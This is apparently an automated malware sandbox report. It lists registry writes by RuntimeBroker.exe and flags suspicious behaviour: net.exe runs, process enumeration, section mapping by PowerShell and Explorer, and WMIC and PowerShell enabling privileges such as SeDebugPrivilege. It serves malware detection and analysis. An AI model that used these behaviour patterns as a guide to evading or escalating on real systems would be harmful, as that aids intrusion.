| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000746f2f8463a7d8013e9b828763a7d8013e9b828763a7d801e78e08000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000373732626338623330613061376237373337343232613632306536333634663434623532353539313835306664396333613537313132393563626235396666340000b20009000400efbe03559690035596902e00000000000000000000000000000000000000000000000000f0197500370037003200620063003800620033003000610030006100370062003700370033003700340032003200610036003200300065003600330036003400660034003400620035003200350035003900310038003500300066006400390063003300610035003700310031003200390035006300620062003500390066006600340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37373262633862333061306137623737333734323261363230653633363466343462353235353931383530666439633361353731313239356362623539666634000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a410370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a410370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\37b82531-b0bf-420d- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000069b2e98163a7d80169b2e98163a7d80169b2e98163a7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000323963326132353566326566373638363937353036343739303062393965616465386433343430376234306363343932383666333361363765313734633135620000b20009000400efbe03559690035596902e0000000000000000000000000000000000000000000000000097538f00320039006300320061003200350035006600320065006600370036003800360039003700350030003600340037003900300030006200390039006500610064006500380064003300340034003000370062003400300063006300340039003200380036006600330033006100360037006500310037003400630031003500620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32396332613235356632656637363836393735303634373930306239396561646538643334343037623430636334393238366633336136376531373463313562000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a3b0370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a3b0370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f26f38b6-a9b8-4163- = e41a908b63a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000036601c8463a7d80167df968b63a7d80167df968b63a7d80117f519000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000663264393530653135623863383534393739663131343962363866393431636535616336326430396637636238336639346236343862336263623262396464380000b20009000400efbe03559690035596902e00000000000000000000000000000000000000000000000000d62b4a00660032006400390035003000650031003500620038006300380035003400390037003900660031003100340039006200360038006600390034003100630065003500610063003600320064003000390066003700630062003800330066003900340062003600340038006200330062006300620032006200390064006400380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c66326439353065313562386338353439373966313134396236386639343163653561633632643039663763623833663934623634386233626362326239646438000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a460370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a460370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- = 5ae61e8263a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc7c23c5-8053-49d2- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\226f698dd5def1e53f14883a61dd2000a2581aee75765a4f31a9ac7d198c1474" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\29c2a255f2ef76869750647900b99eade8d34407b40cc49286f33a67e174c15b" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- = 737e398263a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\f2d950e15b8c854979f1149b68f941ce5ac62d09f7cb83f94b648b3bcb2b9dd8" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bfc5aaf5-2e5b-480b- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d5ec228263a7d801d5ec228263a7d801d5ec228263a7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000313937626664663938623930663135363830343766353339303231353937643331376564303261373266646130333532636237383736343431333435383737300000b20009000400efbe03559690035596902e000000000000000000000000000000000000000000000000002b195600310039003700620066006400660039003800620039003000660031003500360038003000340037006600350033003900300032003100350039003700640033003100370065006400300032006100370032006600640061003000330035003200630062003700380037003600340034003100330034003500380037003700300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c31393762666466393862393066313536383034376635333930323135393764333137656430326137326664613033353263623738373634343133343538373730000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a3e0370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a3e0370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = 41edf18163a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- | C:\Windows\System32\RuntimeBroker.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
